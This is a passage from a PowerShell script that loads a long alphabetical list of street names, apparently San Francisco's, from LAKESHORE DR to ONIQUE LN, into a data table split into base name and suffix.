$Streets.Rows.Add("LAKESHORE DR","","LAKESHORE","DR") + $null = $Streets.Rows.Add("LAKESHORE PLZ","","LAKESHORE","PLZ") + $null = $Streets.Rows.Add("LAKEVIEW AVE","","LAKEVIEW","AVE") + $null = $Streets.Rows.Add("LAKEWOOD AVE","","LAKEWOOD","AVE") + $null = $Streets.Rows.Add("LAMARTINE ST","","LAMARTINE","ST") + $null = $Streets.Rows.Add("LAMSON LN","","LAMSON","LN") + $null = $Streets.Rows.Add("LANCASTER LN","","LANCASTER","LN") + $null = $Streets.Rows.Add("LANDERS ST","","LANDERS","ST") + $null = $Streets.Rows.Add("LANE ST","","LANE","ST") + $null = $Streets.Rows.Add("LANGDON CT","","LANGDON","CT") + $null = $Streets.Rows.Add("LANGTON ST","","LANGTON","ST") + $null = $Streets.Rows.Add("LANSDALE AVE","","LANSDALE","AVE") + $null = $Streets.Rows.Add("KELHAM ST","","KELHAM","ST") + $null = $Streets.Rows.Add("HARMONIA ST","","HARMONIA","ST") + $null = $Streets.Rows.Add("LANSING ST","","LANSING","ST") + $null = $Streets.Rows.Add("LAPHAM WAY","","LAPHAM","WAY") + $null = $Streets.Rows.Add("LAPIDGE ST","","LAPIDGE","ST") + $null = $Streets.Rows.Add("LAPU-LAPU ST","","LAPU-LAPU","ST") + $null = $Streets.Rows.Add("LARCH ST","","LARCH","ST") + $null = $Streets.Rows.Add("LARKIN ST","","LARKIN","ST") + $null = $Streets.Rows.Add("LAS VILLAS CT","","LAS VILLAS","CT") + $null = $Streets.Rows.Add("LASKIE ST","","LASKIE","ST") + $null = $Streets.Rows.Add("LASSEN ALY","","LASSEN","ALY") + $null = $Streets.Rows.Add("LATHROP AVE","","LATHROP","AVE") + $null = $Streets.Rows.Add("LATONA ST","","LATONA","ST") + $null = $Streets.Rows.Add("LAURA ST","","LAURA","ST") + $null = $Streets.Rows.Add("LAUREL ST","","LAUREL","ST") + $null = $Streets.Rows.Add("LAUREN CT","","LAUREN","CT") + $null = $Streets.Rows.Add("LAUSSAT ST","","LAUSSAT","ST") + $null = $Streets.Rows.Add("LAWRENCE AVE","","LAWRENCE","AVE") + $null = $Streets.Rows.Add("LAWTON ST","","LAWTON","ST") + $null = $Streets.Rows.Add("LE CONTE AVE","","LE CONTE","AVE") + $null = $Streets.Rows.Add("LE CONTE CIR","","LE CONTE","CIR") + $null = $Streets.Rows.Add("LEAVENWORTH ST","","LEAVENWORTH","ST") + $null = $Streets.Rows.Add("LEDYARD ST","","LEDYARD","ST") + $null = $Streets.Rows.Add("LEE AVE","","LEE","AVE") + $null = $Streets.Rows.Add("LEESE ST","","LEESE","ST") + $null = $Streets.Rows.Add("LEGION CT","","LEGION","CT") + $null = $Streets.Rows.Add("LEGION OF HONOR DR","","LEGION OF HONOR","DR") + $null = $Streets.Rows.Add("LEIDESDORFF ST","","LEIDESDORFF","ST") + $null = $Streets.Rows.Add("LELAND AVE","","LELAND","AVE") + $null = $Streets.Rows.Add("LENDRUM CT","","LENDRUM","CT") + $null = $Streets.Rows.Add("LENOX WAY","","LENOX","WAY") + $null = $Streets.Rows.Add("LEO ST","","LEO","ST") + $null = $Streets.Rows.Add("LEONA TER","","LEONA","TER") + $null = $Streets.Rows.Add("LEROY PL","","LEROY","PL") + $null = $Streets.Rows.Add("LESSING ST","","LESSING","ST") + $null = $Streets.Rows.Add("LESTER CT","","LESTER","CT") + $null = $Streets.Rows.Add("LETTERMAN DR","","LETTERMAN","DR") + $null = $Streets.Rows.Add("LETTERMAN HOSPITAL ACCESS","","LETTERMAN HOSPITAL ACCESS","") + $null = $Streets.Rows.Add("BURROWS DR","","BURROWS","DR") + $null = $Streets.Rows.Add("LEVANT ST","","LEVANT","ST") + $null = $Streets.Rows.Add("LEXINGTON ST","","LEXINGTON","ST") + $null = $Streets.Rows.Add("LIBERTY ST","","LIBERTY","ST") + $null = $Streets.Rows.Add("LICK PL","","LICK","PL") + $null = $Streets.Rows.Add("LIEBIG ST","","LIEBIG","ST") + $null = $Streets.Rows.Add("LIGGETT AVE","","LIGGETT","AVE") + $null = $Streets.Rows.Add("LILAC ST","","LILAC","ST") + $null = $Streets.Rows.Add("LILLIAN ST","","LILLIAN","ST") + $null = $Streets.Rows.Add("LILY ST","","LILY","ST") + $null = $Streets.Rows.Add("LINARES AVE","","LINARES","AVE") + $null = $Streets.Rows.Add("LINCOLN BLVD","","LINCOLN","BLVD") + $null = $Streets.Rows.Add("LINCOLN CT","","LINCOLN","CT") + $null = $Streets.Rows.Add("LINCOLN WAY","","LINCOLN","WAY") + $null = $Streets.Rows.Add("LINDA ST","","LINDA","ST") + $null = $Streets.Rows.Add("LINDA VISTA STPS","","LINDA VISTA","STPS") + $null = $Streets.Rows.Add("LINDEN ST","","LINDEN","ST") + $null = $Streets.Rows.Add("LINDSAY CIR","","LINDSAY","CIR") + $null = $Streets.Rows.Add("LIPPARD AVE","","LIPPARD","AVE") + $null = $Streets.Rows.Add("LISBON ST","","LISBON","ST") + $null = $Streets.Rows.Add("LITTLEFIELD TER","","LITTLEFIELD","TER") + $null = $Streets.Rows.Add("LIVINGSTON ST","","LIVINGSTON","ST") + $null = $Streets.Rows.Add("LLOYD ST","","LLOYD","ST") + $null = $Streets.Rows.Add("LOBOS ST","","LOBOS","ST") + $null = $Streets.Rows.Add("LOCKSLEY AVE","","LOCKSLEY","AVE") + $null = $Streets.Rows.Add("LOCKWOOD ST","","LOCKWOOD","ST") + $null = $Streets.Rows.Add("LOCUST ST","","LOCUST","ST") + $null = $Streets.Rows.Add("LOEHR ST","","LOEHR","ST") + $null = $Streets.Rows.Add("LOIS LN","","LOIS","LN") + $null = $Streets.Rows.Add("LOMA VISTA TER","","LOMA VISTA","TER") + $null = $Streets.Rows.Add("LOMBARD ST","","LOMBARD","ST") + $null = $Streets.Rows.Add("LOMITA AVE","","LOMITA","AVE") + $null = $Streets.Rows.Add("LONDON ST","","LONDON","ST") + $null = $Streets.Rows.Add("LONE MOUNTAIN TER","","LONE MOUNTAIN","TER") + $null = $Streets.Rows.Add("LONG AVE","","LONG","AVE") + $null = $Streets.Rows.Add("LONG BRIDGE ST","","LONG BRIDGE","ST") + $null = $Streets.Rows.Add("LONGVIEW CT","","LONGVIEW","CT") + $null = $Streets.Rows.Add("LOOMIS ST","","LOOMIS","ST") + $null = $Streets.Rows.Add("LOPEZ AVE","","LOPEZ","AVE") + $null = $Streets.Rows.Add("LORAINE CT","","LORAINE","CT") + $null = $Streets.Rows.Add("LORI LN","","LORI","LN") + $null = $Streets.Rows.Add("LOS PALMOS DR","","LOS PALMOS","DR") + $null = $Streets.Rows.Add("LOTTIE BENNETT LN","","LOTTIE BENNETT","LN") + $null = $Streets.Rows.Add("LOUISBURG ST","","LOUISBURG","ST") + $null = $Streets.Rows.Add("LOUISIANA ST","","LOUISIANA","ST") + $null = $Streets.Rows.Add("LOWELL ST","","LOWELL","ST") + $null = $Streets.Rows.Add("LOWER TER","","LOWER","TER") + $null = $Streets.Rows.Add("LOWER FORT MASON ST","","LOWER FORT MASON","ST") + $null = $Streets.Rows.Add("LOYOLA TER","","LOYOLA","TER") + $null = $Streets.Rows.Add("LUCERNE ST","","LUCERNE","ST") + $null = $Streets.Rows.Add("LUCKY ST","","LUCKY","ST") + $null = $Streets.Rows.Add("LUCY ST","","LUCY","ST") + $null = $Streets.Rows.Add("LUDLOW ALY","","LUDLOW","ALY") + $null = $Streets.Rows.Add("LULU ALY","","LULU","ALY") + $null = $Streets.Rows.Add("LUNADO CT","","LUNADO","CT") + $null = $Streets.Rows.Add("LUNADO WAY","","LUNADO","WAY") + $null = $Streets.Rows.Add("LUNDEEN ST","","LUNDEEN","ST") + $null = $Streets.Rows.Add("LUNDYS LN","","LUNDYS","LN") + $null = $Streets.Rows.Add("LUPINE AVE","","LUPINE","AVE") + $null = $Streets.Rows.Add("LURLINE ST","","LURLINE","ST") + $null = $Streets.Rows.Add("LURMONT TER","","LURMONT","TER") + $null = $Streets.Rows.Add("LUSK ST","","LUSK","ST") + $null = $Streets.Rows.Add("LYDIA AVE","","LYDIA","AVE") + $null = $Streets.Rows.Add("LYELL ST","","LYELL","ST") + $null = $Streets.Rows.Add("LYNCH ST","","LYNCH","ST") + $null = $Streets.Rows.Add("LYNDHURST DR","","LYNDHURST","DR") + $null = $Streets.Rows.Add("LYON ST","","LYON","ST") + $null = $Streets.Rows.Add("LYSETTE ST","","LYSETTE","ST") + $null = $Streets.Rows.Add("MABEL ALY","","MABEL","ALY") + $null = $Streets.Rows.Add("MABINI ST","","MABINI","ST") + $null = $Streets.Rows.Add("MABREY CT","","MABREY","CT") + $null = $Streets.Rows.Add("MACALLA CT","","MACALLA","CT") + $null = $Streets.Rows.Add("MACALLA RD","","MACALLA","RD") + $null = $Streets.Rows.Add("MACARTHUR AVE","","MACARTHUR","AVE") + $null = $Streets.Rows.Add("MACEDONIA ST","","MACEDONIA","ST") + $null = $Streets.Rows.Add("MACONDRAY LN","","MACONDRAY","LN") + $null = $Streets.Rows.Add("MADDUX AVE","","MADDUX","AVE") + $null = $Streets.Rows.Add("MADERA ST","","MADERA","ST") + $null = $Streets.Rows.Add("MADISON ST","","MADISON","ST") + $null = $Streets.Rows.Add("MADRID ST","","MADRID","ST") + $null = $Streets.Rows.Add("MADRONE AVE","","MADRONE","AVE") + $null = $Streets.Rows.Add("MAGELLAN AVE","","MAGELLAN","AVE") + $null = $Streets.Rows.Add("MAGNOLIA ST","","MAGNOLIA","ST") + $null = $Streets.Rows.Add("MAHAN ST","","MAHAN","ST") + $null = $Streets.Rows.Add("MAIDEN LN","","MAIDEN","LN") + $null = $Streets.Rows.Add("MAIN DR","","MAIN","DR") + $null = $Streets.Rows.Add("MAIN ST","","MAIN","ST") + $null = $Streets.Rows.Add("MAJESTIC AVE","","MAJESTIC","AVE") + $null = $Streets.Rows.Add("MALDEN ALY","","MALDEN","ALY") + $null = $Streets.Rows.Add("MALLORCA WAY","","MALLORCA","WAY") + $null = $Streets.Rows.Add("MALTA DR","","MALTA","DR") + $null = $Streets.Rows.Add("MALVINA PL","","MALVINA","PL") + $null = $Streets.Rows.Add("MANCHESTER ST","","MANCHESTER","ST") + $null = $Streets.Rows.Add("MANDALAY LN","","MANDALAY","LN") + $null = $Streets.Rows.Add("MANGELS AVE","","MANGELS","AVE") + $null = $Streets.Rows.Add("MANOR DR","","MANOR","DR") + $null = $Streets.Rows.Add("MANSEAU ST","","MANSEAU","ST") + $null = $Streets.Rows.Add("MANSELL ST","","MANSELL","ST") + $null = $Streets.Rows.Add("MANSFIELD ST","","MANSFIELD","ST") + $null = $Streets.Rows.Add("MANZANITA AVE","","MANZANITA","AVE") + $null = $Streets.Rows.Add("MAPLE ST","","MAPLE","ST") + $null = $Streets.Rows.Add("MARCELA AVE","","MARCELA","AVE") + $null = $Streets.Rows.Add("MARCY PL","","MARCY","PL") + $null = $Streets.Rows.Add("MARENGO ST","","MARENGO","ST") + $null = $Streets.Rows.Add("MARGARET AVE","","MARGARET","AVE") + $null = $Streets.Rows.Add("MARGRAVE PL","","MARGRAVE","PL") + $null = $Streets.Rows.Add("MARIETTA DR","","MARIETTA","DR") + $null = $Streets.Rows.Add("MARIN ST","","MARIN","ST") + $null = $Streets.Rows.Add("MARINA BLVD","","MARINA","BLVD") + $null = $Streets.Rows.Add("MARINA GREEN DR","","MARINA GREEN","DR") + $null = $Streets.Rows.Add("MARINE DR","","MARINE","DR") + $null = $Streets.Rows.Add("MARINER DR","","MARINER","DR") + $null = $Streets.Rows.Add("MARION PL","","MARION","PL") + $null = $Streets.Rows.Add("MARIPOSA ST","","MARIPOSA","ST") + $null = $Streets.Rows.Add("MARIST CT","","MARIST","CT") + $null = $Streets.Rows.Add("MARK LN","","MARK","LN") + $null = $Streets.Rows.Add("MARK TWAIN PL","","MARK TWAIN","PL") + $null = $Streets.Rows.Add("MARKET ST","","MARKET","ST") + $null = $Streets.Rows.Add("MARLIN CT","","MARLIN","CT") + $null = $Streets.Rows.Add("MARNE AVE","","MARNE","AVE") + $null = $Streets.Rows.Add("MARS ST","","MARS","ST") + $null = $Streets.Rows.Add("MARSHALL ST","","MARSHALL","ST") + $null = $Streets.Rows.Add("MARSILY ST","","MARSILY","ST") + $null = $Streets.Rows.Add("MARSTON AVE","","MARSTON","AVE") + $null = $Streets.Rows.Add("MARTHA AVE","","MARTHA","AVE") + $null = $Streets.Rows.Add("MARTIN LUTHER KING JR DR","","MARTIN LUTHER KING JR","DR") + $null = $Streets.Rows.Add("MARTINEZ ST","","MARTINEZ","ST") + $null = $Streets.Rows.Add("MARVEL CT","","MARVEL","CT") + $null = $Streets.Rows.Add("MARVIEW WAY","","MARVIEW","WAY") + $null = $Streets.Rows.Add("MARY ST","","MARY","ST") + $null = $Streets.Rows.Add("MARY TERESA ST","","MARY TERESA","ST") + $null = $Streets.Rows.Add("MARYLAND ST","","MARYLAND","ST") + $null = $Streets.Rows.Add("MASON CT","","MASON","CT") + $null = $Streets.Rows.Add("MASON ST","","MASON","ST") + $null = $Streets.Rows.Add("MASONIC AVE","","MASONIC","AVE") + $null = $Streets.Rows.Add("MASSACHUSETTS ST","","MASSACHUSETTS","ST") + $null = $Streets.Rows.Add("MASSASOIT ST","","MASSASOIT","ST") + $null = $Streets.Rows.Add("MATEO ST","","MATEO","ST") + $null = $Streets.Rows.Add("MATTHEW CT","","MATTHEW","CT") + $null = $Streets.Rows.Add("MAULDIN ST","","MAULDIN","ST") + $null = $Streets.Rows.Add("MAXWELL CT","","MAXWELL","CT") + $null = $Streets.Rows.Add("MAYFAIR DR","","MAYFAIR","DR") + $null = $Streets.Rows.Add("MAYFLOWER ST","","MAYFLOWER","ST") + $null = $Streets.Rows.Add("MAYNARD ST","","MAYNARD","ST") + $null = $Streets.Rows.Add("MAYWOOD DR","","MAYWOOD","DR") + $null = $Streets.Rows.Add("MCALLISTER ST","","MCALLISTER","ST") + $null = $Streets.Rows.Add("MCCANN ST","","MCCANN","ST") + $null = $Streets.Rows.Add("MCCARTHY AVE","","MCCARTHY","AVE") + $null = $Streets.Rows.Add("MCCOPPIN ST","","MCCOPPIN","ST") + $null = $Streets.Rows.Add("MCCORMICK ST","","MCCORMICK","ST") + $null = $Streets.Rows.Add("MCDONALD ST","","MCDONALD","ST") + $null = $Streets.Rows.Add("MCDOWELL AVE","","MCDOWELL","AVE") + $null = $Streets.Rows.Add("MCKINLEY AVE","","MCKINLEY","AVE") + $null = $Streets.Rows.Add("MCKINNON AVE","","MCKINNON","AVE") + $null = $Streets.Rows.Add("MCLAREN AVE","","MCLAREN","AVE") + $null = $Streets.Rows.Add("MCLAREN LODGE ACCESS RD","","MCLAREN LODGE ACCESS","RD") + $null = $Streets.Rows.Add("MCLEA CT","","MCLEA","CT") + $null = $Streets.Rows.Add("MCNAIR CT","","MCNAIR","CT") + $null = $Streets.Rows.Add("MCRAE LN","","MCRAE","LN") + $null = $Streets.Rows.Add("MCRAE ST","","MCRAE","ST") + $null = $Streets.Rows.Add("MEACHAM PL","","MEACHAM","PL") + $null = $Streets.Rows.Add("MEADE AVE","","MEADE","AVE") + $null = $Streets.Rows.Add("MEADOWBROOK DR","","MEADOWBROOK","DR") + $null = $Streets.Rows.Add("MEDA AVE","","MEDA","AVE") + $null = $Streets.Rows.Add("MEDAU PL","","MEDAU","PL") + $null = $Streets.Rows.Add("MEDICAL CENTER WAY","","MEDICAL CENTER","WAY") + $null = $Streets.Rows.Add("MEGAN DR","","MEGAN","DR") + $null = $Streets.Rows.Add("MELBA AVE","","MELBA","AVE") + $null = $Streets.Rows.Add("MELRA CT","","MELRA","CT") + $null = $Streets.Rows.Add("MELROSE AVE","","MELROSE","AVE") + $null = $Streets.Rows.Add("MENDELL ST","","MENDELL","ST") + $null = $Streets.Rows.Add("MENDOSA AVE","","MENDOSA","AVE") + $null = $Streets.Rows.Add("MENOHER LN","","MENOHER","LN") + $null = $Streets.Rows.Add("MERCATO CT","","MERCATO","CT") + $null = $Streets.Rows.Add("MERCED AVE","","MERCED","AVE") + $null = $Streets.Rows.Add("MERCEDES WAY","","MERCEDES","WAY") + $null = $Streets.Rows.Add("MERCHANT RD","","MERCHANT","RD") + $null = $Streets.Rows.Add("MERCHANT ST","","MERCHANT","ST") + $null = $Streets.Rows.Add("MERCURY ST","","MERCURY","ST") + $null = $Streets.Rows.Add("MERLIN ST","","MERLIN","ST") + $null = $Streets.Rows.Add("MERRIAM LN","","MERRIAM","LN") + $null = $Streets.Rows.Add("MERRIE WAY","","MERRIE","WAY") + $null = $Streets.Rows.Add("MERRILL ST","","MERRILL","ST") + $null = $Streets.Rows.Add("MERRIMAC ST","","MERRIMAC","ST") + $null = $Streets.Rows.Add("MERRITT ST","","MERRITT","ST") + $null = $Streets.Rows.Add("MERSEY ST","","MERSEY","ST") + $null = $Streets.Rows.Add("MESA AVE","","MESA","AVE") + $null = $Streets.Rows.Add("MESA ST","","MESA","ST") + $null = $Streets.Rows.Add("METSON RD","","METSON","RD") + $null = $Streets.Rows.Add("MICHIGAN ST","","MICHIGAN","ST") + $null = $Streets.Rows.Add("MIDCREST WAY","","MIDCREST","WAY") + $null = $Streets.Rows.Add("MIDDLE POINT RD","","MIDDLE POINT","RD") + $null = $Streets.Rows.Add("MIDDLE WEST DR","","MIDDLE WEST","DR") + $null = $Streets.Rows.Add("MIDDLEFIELD DR","","MIDDLEFIELD","DR") + $null = $Streets.Rows.Add("MIDWAY ST","","MIDWAY","ST") + $null = $Streets.Rows.Add("MIGUEL ST","","MIGUEL","ST") + $null = $Streets.Rows.Add("MILAN TER","","MILAN","TER") + $null = $Streets.Rows.Add("MILES CT","","MILES","CT") + $null = $Streets.Rows.Add("MILES ST","","MILES","ST") + $null = $Streets.Rows.Add("MILEY ST","","MILEY","ST") + $null = $Streets.Rows.Add("MILL ST","","MILL","ST") + $null = $Streets.Rows.Add("MILLER PL","","MILLER","PL") + $null = $Streets.Rows.Add("MILLER RD","","MILLER","RD") + $null = $Streets.Rows.Add("MILLWRIGHT COTTAGE ACCESS RD","","MILLWRIGHT COTTAGE ACCESS","RD") + $null = $Streets.Rows.Add("MILTON ST","","MILTON","ST") + $null = $Streets.Rows.Add("MINERVA ST","","MINERVA","ST") + $null = $Streets.Rows.Add("MINNA ST","","MINNA","ST") + $null = $Streets.Rows.Add("MINNESOTA ST","","MINNESOTA","ST") + $null = $Streets.Rows.Add("MINT PLZ","","MINT","PLZ") + $null = $Streets.Rows.Add("MINT ST","","MINT","ST") + $null = $Streets.Rows.Add("MIRABEL AVE","","MIRABEL","AVE") + $null = $Streets.Rows.Add("MIRALOMA DR","","MIRALOMA","DR") + $null = $Streets.Rows.Add("MIRAMAR AVE","","MIRAMAR","AVE") + $null = $Streets.Rows.Add("MIRANDO WAY","","MIRANDO","WAY") + $null = $Streets.Rows.Add("MISSION ST","","MISSION","ST") + $null = $Streets.Rows.Add("BLOSSOM LN","","BLOSSOM","LN") + $null = $Streets.Rows.Add("SIXTH ST","","SIXTH","ST") + $null = $Streets.Rows.Add("MISSION BAY CIR","","MISSION BAY","CIR") + $null = $Streets.Rows.Add("MISSION BAY DR","","MISSION BAY","DR") + $null = $Streets.Rows.Add("IRONWOOD WAY","","IRONWOOD","WAY") + $null = $Streets.Rows.Add("CATALINA ST","","CATALINA","ST") + $null = $Streets.Rows.Add("MISSION ROCK ST","","MISSION ROCK","ST") + $null = $Streets.Rows.Add("MISSISSIPPI ST","","MISSISSIPPI","ST") + $null = $Streets.Rows.Add("MISSOURI ST","","MISSOURI","ST") + $null = $Streets.Rows.Add("MISTRAL ST","","MISTRAL","ST") + $null = $Streets.Rows.Add("MIZPAH ST","","MIZPAH","ST") + $null = $Streets.Rows.Add("MODOC AVE","","MODOC","AVE") + $null = $Streets.Rows.Add("MOFFITT ST","","MOFFITT","ST") + $null = $Streets.Rows.Add("MOJAVE ST","","MOJAVE","ST") + $null = $Streets.Rows.Add("MOLIMO DR","","MOLIMO","DR") + $null = $Streets.Rows.Add("MONCADA WAY","","MONCADA","WAY") + $null = $Streets.Rows.Add("MONETA CT","","MONETA","CT") + $null = $Streets.Rows.Add("MONETA WAY","","MONETA","WAY") + $null = $Streets.Rows.Add("MONO ST","","MONO","ST") + $null = $Streets.Rows.Add("MONTAGUE PL","","MONTAGUE","PL") + $null = $Streets.Rows.Add("MONTALVO AVE","","MONTALVO","AVE") + $null = $Streets.Rows.Add("MONTANA ST","","MONTANA","ST") + $null = $Streets.Rows.Add("MONTCALM ST","","MONTCALM","ST") + $null = $Streets.Rows.Add("PARK ST","","PARK","ST") + $null = $Streets.Rows.Add("MONTCLAIR TER","","MONTCLAIR","TER") + $null = $Streets.Rows.Add("MONTE VISTA DR","","MONTE VISTA","DR") + $null = $Streets.Rows.Add("MONTECITO AVE","","MONTECITO","AVE") + $null = $Streets.Rows.Add("MONTEREY BLVD","","MONTEREY","BLVD") + $null = $Streets.Rows.Add("MONTEZUMA ST","","MONTEZUMA","ST") + $null = $Streets.Rows.Add("MONTGOMERY ST","","MONTGOMERY","ST") + $null = $Streets.Rows.Add("MONTICELLO ST","","MONTICELLO","ST") + $null = $Streets.Rows.Add("MONUMENT WAY","","MONUMENT","WAY") + $null = $Streets.Rows.Add("MOORE LN","","MOORE","LN") + $null = $Streets.Rows.Add("MOORE PL","","MOORE","PL") + $null = $Streets.Rows.Add("MORAGA AVE","","MORAGA","AVE") + $null = $Streets.Rows.Add("MORAGA ST","","MORAGA","ST") + $null = $Streets.Rows.Add("MORELAND ST","","MORELAND","ST") + $null = $Streets.Rows.Add("MORGAN ALY","","MORGAN","ALY") + $null = $Streets.Rows.Add("MORNINGSIDE DR","","MORNINGSIDE","DR") + $null = $Streets.Rows.Add("MORRELL PL","","MORRELL","PL") + $null = $Streets.Rows.Add("MORRELL ST","","MORRELL","ST") + $null = $Streets.Rows.Add("MORRIS ST","","MORRIS","ST") + $null = $Streets.Rows.Add("MORSE ST","","MORSE","ST") + $null = $Streets.Rows.Add("MORTON ST","","MORTON","ST") + $null = $Streets.Rows.Add("MOSCOW ST","","MOSCOW","ST") + $null = $Streets.Rows.Add("MOSS ST","","MOSS","ST") + $null = $Streets.Rows.Add("MOULTON ST","","MOULTON","ST") + $null = $Streets.Rows.Add("MOULTRIE ST","","MOULTRIE","ST") + $null = $Streets.Rows.Add("MOUNT LN","","MOUNT","LN") + $null = $Streets.Rows.Add("MOUNT VERNON AVE","","MOUNT VERNON","AVE") + $null = $Streets.Rows.Add("MOUNTAIN SPRING AVE","","MOUNTAIN SPRING","AVE") + $null = $Streets.Rows.Add("MOUNTVIEW CT","","MOUNTVIEW","CT") + $null = $Streets.Rows.Add("MUIR CT","","MUIR","CT") + $null = $Streets.Rows.Add("MUIR LOOP","","MUIR","LOOP") + $null = $Streets.Rows.Add("MULFORD ALY","","MULFORD","ALY") + $null = $Streets.Rows.Add("MULLEN AVE","","MULLEN","AVE") + $null = $Streets.Rows.Add("MUNICH ST","","MUNICH","ST") + $null = $Streets.Rows.Add("MURRAY LN","","MURRAY","LN") + $null = $Streets.Rows.Add("MURRAY ST","","MURRAY","ST") + $null = $Streets.Rows.Add("MUSEUM WAY","","MUSEUM","WAY") + $null = $Streets.Rows.Add("MUSIC CONCOURSE DR","","MUSIC CONCOURSE","DR") + $null = $Streets.Rows.Add("MUSIC CONCOURSE ACCESS RD","","MUSIC CONCOURSE ACCESS","RD") + $null = $Streets.Rows.Add("MYRA WAY","","MYRA","WAY") + $null = $Streets.Rows.Add("MYRTLE ST","","MYRTLE","ST") + $null = $Streets.Rows.Add("NADELL CT","","NADELL","CT") + $null = $Streets.Rows.Add("NAGLEE AVE","","NAGLEE","AVE") + $null = $Streets.Rows.Add("NAHUA AVE","","NAHUA","AVE") + $null = $Streets.Rows.Add("NANCY PELOSI DR","","NANCY PELOSI","DR") + $null = $Streets.Rows.Add("NANTUCKET AVE","","NANTUCKET","AVE") + $null = $Streets.Rows.Add("NAPIER LN","","NAPIER","LN") + $null = $Streets.Rows.Add("NAPLES ST","","NAPLES","ST") + $null = $Streets.Rows.Add("NAPOLEON ST","","NAPOLEON","ST") + $null = $Streets.Rows.Add("NATICK ST","","NATICK","ST") + $null = $Streets.Rows.Add("NATOMA ST","","NATOMA","ST") + $null = $Streets.Rows.Add("NAUMAN RD","","NAUMAN","RD") + $null = $Streets.Rows.Add("NAUTILUS DR","","NAUTILUS","DR") + $null = $Streets.Rows.Add("NAVAJO AVE","","NAVAJO","AVE") + $null = $Streets.Rows.Add("NAVY RD","","NAVY","RD") + $null = $Streets.Rows.Add("NAYLOR ST","","NAYLOR","ST") + $null = $Streets.Rows.Add("NEBRASKA ST","","NEBRASKA","ST") + $null = $Streets.Rows.Add("NELLIE ST","","NELLIE","ST") + $null = $Streets.Rows.Add("NELSON AVE","","NELSON","AVE") + $null = $Streets.Rows.Add("NELSON RISING LN","","NELSON RISING","LN") + $null = $Streets.Rows.Add("NEPTUNE ST","","NEPTUNE","ST") + $null = $Streets.Rows.Add("NEVADA ST","","NEVADA","ST") + $null = $Streets.Rows.Add("NEW MONTGOMERY ST","","NEW MONTGOMERY","ST") + $null = $Streets.Rows.Add("NEWBURG ST","","NEWBURG","ST") + $null = $Streets.Rows.Add("NEWCOMB AVE","","NEWCOMB","AVE") + $null = $Streets.Rows.Add("NEWELL ST","","NEWELL","ST") + $null = $Streets.Rows.Add("NEWHALL ST","","NEWHALL","ST") + $null = $Streets.Rows.Add("NEWMAN ST","","NEWMAN","ST") + $null = $Streets.Rows.Add("NEWTON ST","","NEWTON","ST") + $null = $Streets.Rows.Add("NEY ST","","NEY","ST") + $null = $Streets.Rows.Add("NIAGARA AVE","","NIAGARA","AVE") + $null = $Streets.Rows.Add("NIANTIC AVE","","NIANTIC","AVE") + $null = $Streets.Rows.Add("NIBBI CT","","NIBBI","CT") + $null = $Streets.Rows.Add("NICHOLS WAY","","NICHOLS","WAY") + $null = $Streets.Rows.Add("NIDO AVE","","NIDO","AVE") + $null = $Streets.Rows.Add("NIMITZ AVE","","NIMITZ","AVE") + $null = $Streets.Rows.Add("NIMITZ DR","","NIMITZ","DR") + $null = $Streets.Rows.Add("NIMITZ LN","","NIMITZ","LN") + $null = $Streets.Rows.Add("NOB HILL PL","","NOB HILL","PL") + $null = $Streets.Rows.Add("NOBLES ALY","","NOBLES","ALY") + $null = $Streets.Rows.Add("NOE ST","","NOE","ST") + $null = $Streets.Rows.Add("NORDHOFF ST","","NORDHOFF","ST") + $null = $Streets.Rows.Add("NORFOLK ST","","NORFOLK","ST") + $null = $Streets.Rows.Add("NORIEGA ST","","NORIEGA","ST") + $null = $Streets.Rows.Add("NORMANDIE TER","","NORMANDIE","TER") + $null = $Streets.Rows.Add("NORTH DR","","NORTH","DR") + $null = $Streets.Rows.Add("NORTH 15TH AVE","","NORTH 15TH","AVE") + $null = $Streets.Rows.Add("NORTH GATE RD","","NORTH GATE","RD") + $null = $Streets.Rows.Add("NORTH HUGHES LN","","NORTH HUGHES","LN") + $null = $Streets.Rows.Add("NORTH POINT ST","","NORTH POINT","ST") + $null = $Streets.Rows.Add("NORTH VAN HORN LN","","NORTH VAN HORN","LN") + $null = $Streets.Rows.Add("NORTH VIEW CT","","NORTH VIEW","CT") + $null = $Streets.Rows.Add("NORTHGATE DR","","NORTHGATE","DR") + $null = $Streets.Rows.Add("NORTHPOINT DR","","NORTHPOINT","DR") + $null = $Streets.Rows.Add("NORTHRIDGE RD","","NORTHRIDGE","RD") + $null = $Streets.Rows.Add("NORTHWOOD DR","","NORTHWOOD","DR") + $null = $Streets.Rows.Add("NORTON ST","","NORTON","ST") + $null = $Streets.Rows.Add("NORWICH ST","","NORWICH","ST") + $null = $Streets.Rows.Add("NOTTINGHAM PL","","NOTTINGHAM","PL") + $null = $Streets.Rows.Add("NUEVA AVE","","NUEVA","AVE") + $null = $Streets.Rows.Add("OAK ST","","OAK","ST") + $null = $Streets.Rows.Add("OAK ACCESS RD","","OAK ACCESS","RD") + $null = $Streets.Rows.Add("OAK GROVE ST","","OAK GROVE","ST") + $null = $Streets.Rows.Add("OAK PARK DR","","OAK PARK","DR") + $null = $Streets.Rows.Add("OAKDALE AVE","","OAKDALE","AVE") + $null = $Streets.Rows.Add("OAKHURST LN","","OAKHURST","LN") + $null = $Streets.Rows.Add("OAKWOOD ST","","OAKWOOD","ST") + $null = $Streets.Rows.Add("OCEAN AVE","","OCEAN","AVE") + $null = $Streets.Rows.Add("OCEANVIEW TER","","OCEANVIEW","TER") + $null = $Streets.Rows.Add("OCTAVIA ST","","OCTAVIA","ST") + $null = $Streets.Rows.Add("OFARRELL ST","","OFARRELL","ST") + $null = $Streets.Rows.Add("OGDEN AVE","","OGDEN","AVE") + $null = $Streets.Rows.Add("OHLONE WAY","","OHLONE","WAY") + $null = $Streets.Rows.Add("OLD CHINATOWN LN","","OLD CHINATOWN","LN") + $null = $Streets.Rows.Add("OLD MASON ST","","OLD MASON","ST") + $null = $Streets.Rows.Add("OLIVE ST","","OLIVE","ST") + $null = $Streets.Rows.Add("OLIVER ST","","OLIVER","ST") + $null = $Streets.Rows.Add("OLMSTEAD ST","","OLMSTEAD","ST") + $null = $Streets.Rows.Add("OLNEY AVE","","OLNEY","AVE") + $null = $Streets.Rows.Add("OLORAN AVE","","OLORAN","AVE") + $null = $Streets.Rows.Add("OLYMPIA WAY","","OLYMPIA","WAY") + $null = $Streets.Rows.Add("OLYMPIC COUNTRY CLUB RD","","OLYMPIC COUNTRY CLUB","RD") + $null = $Streets.Rows.Add("OMAR WAY","","OMAR","WAY") + $null = $Streets.Rows.Add("ONEIDA AVE","","ONEIDA","AVE") + $null = $Streets.Rows.Add("ONIQUE LN","","ONIQUE","LN") + $null = 